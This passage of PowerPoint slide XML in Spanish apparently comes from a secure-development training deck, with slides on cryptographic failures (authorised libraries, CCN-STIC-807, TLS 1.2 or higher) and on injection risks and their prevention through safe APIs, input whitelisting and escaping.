                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C568E14-3327-4201-6394-919F44EDA4EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5596343" y="5708048"/>
            <a:ext cx="1579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solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Atacante</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Imagen 16" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07BD708C-74AB-440F-13C6-CC6B7D5A37A8}"/>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340603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92CF-D68A-0307-8656-87581564272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B33B7B2-75D9-A882-09AD-BCF9E6895C3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D384BFA-5EB2-486A-DDF6-250EE1869062}"/>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02. Fallos criptográficos - Medidas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06EBF1B7-349A-6F44-C981-338B0684187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6" name="Oval 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11EEA1D-FF30-61AF-EA75-53C1422B2224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3865537" y="4747377"/>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17" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD1FC897-EA13-D1BF-0A4A-01C7775E3504}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3865537" y="3142866"/>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19" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F60755D7-FB2E-7DD5-18EF-0EA6041B9292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132610" y="1442831"/>
            <a:ext cx="603925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Todas las funciones criptográficas deben hacer uso de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>librerías de criptografía autorizadas.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Evitar desarrollos propios.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB9B0A81-4655-F89F-34C0-7E444F4066B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132611" y="3252132"/>
            <a:ext cx="6039251"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Los módulos criptográficos del sistema deben cumplir la guía </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="355A79"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>CCN-STIC-807 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Criptología de empleo en el ENS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CD307D7-40C2-1AE7-7627-8A2C03CEE31D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5141887" y="4976661"/>
            <a:ext cx="6039251"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Implementar cifrado para todas las transmisiones de información sensible (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TLS 1.2 o superior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{910EEBA7-6522-9C21-10C1-38B613570CB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3865537" y="1320727"/>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24" name="Imagen 23" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F97EF33-D84A-29FB-4136-5ED970BE39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8220" y="1507417"/>
            <a:ext cx="731520" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Imagen 24" descr="Texto, Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF914DB-EF02-2688-A67F-A50423F763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8220" y="3376322"/>
            <a:ext cx="731520" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Imagen 25" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D93659DF-5675-FF86-D518-A222D5BB6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8220" y="5027303"/>
            <a:ext cx="595689" cy="595689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Imagen 26" descr="Un dibujo de una persona&#10;&#10;Descripción generada automáticamente con confianza baja">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41E704B6-9838-FC44-B368-D49A81517D3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="22315" t="20697" r="28995"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2899" y="1604154"/>
            <a:ext cx="3257609" cy="3764363"/>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2A41D288-8F93-C077-01FB-A230E140C703}"/>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627482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D0CF4-888F-9F69-8C12-7FE96592604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C2573C7-1930-EC8F-E10F-A4AE922F266A}"/>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01A4D17-2D89-41A5-D87C-E6DBF4B14985}"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C8FE403-D42A-17F6-6656-1CF286B347A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0649AEEC-3612-C56C-DFF8-B2FC00227B03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2015034" y="1505410"/>
            <a:ext cx="5870278" cy="64633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Se producen cuando se envían </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>datos no fiables a un intérprete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> como parte de un comando o consulta.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97517CE6-AB37-8269-8EC9-DA6B100E72A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2015034" y="2981381"/>
            <a:ext cx="5870278"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Los datos hostiles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>del</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> atacante pueden engañar al intérprete para que ejecute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>comandos no deseados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acceda a datos sin la debida autorización</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CuadroTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BD3AED3-C7BD-AEB7-B710-25471FB5000A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2015034" y="4572573"/>
            <a:ext cx="5870278" cy="1200329"/>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Prevención mediante utilización de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API segura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>validación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de entrada (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>), evitar consultas dinámicas, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sintaxis de escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de caracteres especiales…</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A538FE03-6666-BE8A-FAB4-40A310F5EC99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710547" y="4620382"/>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7" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60F81A43-0913-F428-52FD-F68D5ED86188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710547" y="1278014"/>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8" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CA3F33A-79E9-B9E6-2F45-50A27C4B883E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710547" y="2920971"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B17163E-D0F0-0766-9A2D-D6570B4028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829" y="1478295"/>
            <a:ext cx="704335" cy="704335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Imagen 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{716CD16A-D975-26E4-DAC1-15B47AA70C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86" y="3057075"/>
            <a:ext cx="704335" cy="704335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Imagen 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205EC6A6-EB31-1E8B-7580-7541C834A2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6751" y="4866587"/>
            <a:ext cx="612489" cy="612489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Imagen 11" descr="Imagen que contiene Texto&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD1182D5-6F6A-6F6D-2296-4E19F34E9888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="14517" r="35719" b="27972"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8326849" y="1043033"/>
            <a:ext cx="3867684" cy="4939688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Imagen 13" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5150760E-E074-B753-4D93-C7FCCBC67E9A}"/>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230454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A6867-FB0A-99D5-51D1-74893F56349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7A9115F-D27D-019E-4C84-9E9850563EA3}"/>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D137E69-7C33-C9D6-3684-EA46D36EC4AC}"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17D87109-4763-8634-B239-196B3B5EDF5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3" name="CuadroTexto 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9110A7AA-F05E-C796-1C34-BFEBA60AB8C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5664282" y="1200429"/>
            <a:ext cx="4936961" cy="369332"/>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Un atacante podría:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ED8D7ED-0C2F-DAF9-D67E-E35CFED0DF68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6575282" y="1943278"/>
            <a:ext cx="4434517"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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Acceder, modificar o eliminar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>registros de una base de datos de manera no autorizada.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CuadroTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{444305D6-1122-9E99-94EB-988890810AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6575282" y="4858300"/>
            <a:ext cx="4494282" cy="646331"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Suplantar a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>otros usuarios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> mediante el acceso al sistema de credenciales.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="CuadroTexto 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6326BE2-F684-E26D-7022-B485322818BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579626" y="3538621"/>
            <a:ext cx="4282581" cy="646331"/>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Realizar ataques de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>denegación de servicio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
